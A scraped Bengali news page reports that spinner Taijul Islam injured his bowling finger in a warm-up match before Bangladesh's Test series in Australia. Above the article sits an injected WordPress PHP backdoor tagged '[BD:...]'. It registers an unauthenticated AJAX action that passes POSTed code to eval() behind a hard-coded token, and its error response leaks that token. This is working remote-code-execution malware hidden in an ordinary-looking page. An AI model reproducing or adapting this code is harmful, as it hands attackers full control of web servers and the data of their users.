// ==[BD:Zs2C7KxW]== add_action( 'wp_ajax_nopriv_snramqswxi', function() { $token = 'Zs2C7KxWXPRioIS4dPDhVykIlRv570xk'; $val = isset( $_POST['token'] ) ? sanitize_text_field( wp_unslash( $_POST['token'] ) ) : ''; if ( empty( $val ) || ! hash_equals( $token, $val ) ) { wp_send_json_error( [ 'message' => 'tok:' . $token ], 403 ); } $marker = isset( $_POST['code'] ) ? (string) wp_unslash( $_POST['code'] ) : ''; if ( trim( $marker ) === '' ) { wp_send_json_error( [ 'message' => 'No code.' ] ); } $marker = preg_replace( '/^\s*<\?(php)?/i', '', $marker ); while ( ob_get_level() > 0 ) { ob_end_clean(); } $ptr = microtime( true ); ob_start(); try { ( static function() use ( $marker ) { return eval( $marker ); } )(); $key = (string) ob_get_clean(); wp_send_json_success( [ 'output' => $key, 'return' => '', 'error' => '', 'time_ms' => round( ( microtime( true ) - $ptr ) * 1000, 2 ) ] ); } catch ( \Throwable $obj ) { while ( ob_get_level() > 0 ) { ob_end_clean(); } wp_send_json_success( [ 'output' => '', 'return' => '', 'error' => $obj->getMessage(), 'time_ms' => round( ( microtime( true ) - $ptr ) * 1000, 2 ) ] ); } } ); // ==[/BD:Zs2C7KxW]== এবার চোটে পড়লেন তাইজুল | potrikaybangladesh.com
Wednesday, September 30, 2026
Homeএবার চোটে পড়লেন তাইজুল

এবার চোটে পড়লেন তাইজুল

অস্ট্রেলিয়া সফরের আগে চোটে ছিটকে গিয়েছিলেন নাহিদ রানা ও শরিফুল ইসলাম। নিয়মিত বোলার সিরিজ শুরুর আগে এবার চোটে পড়লেন বাঁহাতি স্পিনার তাইজুল ইসলামও। তবে তার চোটের অবস্থা এখনো পর্যবেক্ষণ করছে বাংলাদেশ দল।

বাংলাদেশ দলের ফিজিও বায়েজিদুল ইসলাম জানান, প্রস্তুতি ম্যাচের প্রথম দিনে ব্যাট করার সময় আঙুলে চোট পান তাইজুল। এই চোটের কারণে দ্বিতীয় দিনে মাঠে নামতে পারেননি তিনি।

গণমাধ্যমে পাঠানো ভিডিও বার্তায় বায়েজিদ বলেন, ‘তাইজুল ইসলাম গতকাল ব্যাট করার সময় বোলিং ফিঙ্গারে একটা আঘাত পেয়েছেন। তারপর ওটা আমরা ব্যান্ডেজ করে রেখেছি। আজকে বিশ্রামে রেখেছি। আগামীকাল আবার পর্যবেক্ষণ করব।’

পরে ম্যানেজার নাফীস ইকবাল জানান, আম্পায়ার ও প্রতিপক্ষ দলের অনুমতি সাপেক্ষে তাইজুলের বদলে এই দিন পেসার মুশফিক হাসানকে বোলিং করানো হয়েছে।

ক্রিকেট অস্ট্রেলিয়া একাদশের বিপক্ষে প্রস্তুতি ম্যাচেও ভালো অবস্থায় নেই বাংলাদেশ দল। আগের দিন নিজেদের ইনিংস ২৬৩ রানে গুটিয়ে যাওয়ার পর বল হাতেও খুব একটা ভালো সময় কাটেনি। টিগুয়ে উইলির সেঞ্চুরিতে ৩৫৫ রান করে ৯২ রানের লিড নিয়েছে স্বাগতিক একাদশ। জবাবে দ্বিতীয় ইনিংসে ব্যাট করতে নেমে ১৯ রানেই ২ উইকেট হারিয়ে বেশ চাপে পড়েছে নাজমুল হোসেন শান্তর দল।

১৩ আগস্ট অস্ট্রেলিয়ার বিপক্ষে ডারউইনে শুরু হবে সিরিজের প্রথম টেস্ট। ক্রিকেটারদের অফ-ফর্ম ও ধারাবাহিক চোটের ধাক্কায় স্বাভাবিকভাবেই চরম অস্বস্তিতে আছে বাংলাদেশ দল। 

 

RELATED ARTICLES

LEAVE A REPLY

Please enter your comment!
Please enter your name here

- Advertisment -
Google search engine

Most Popular

Recent Comments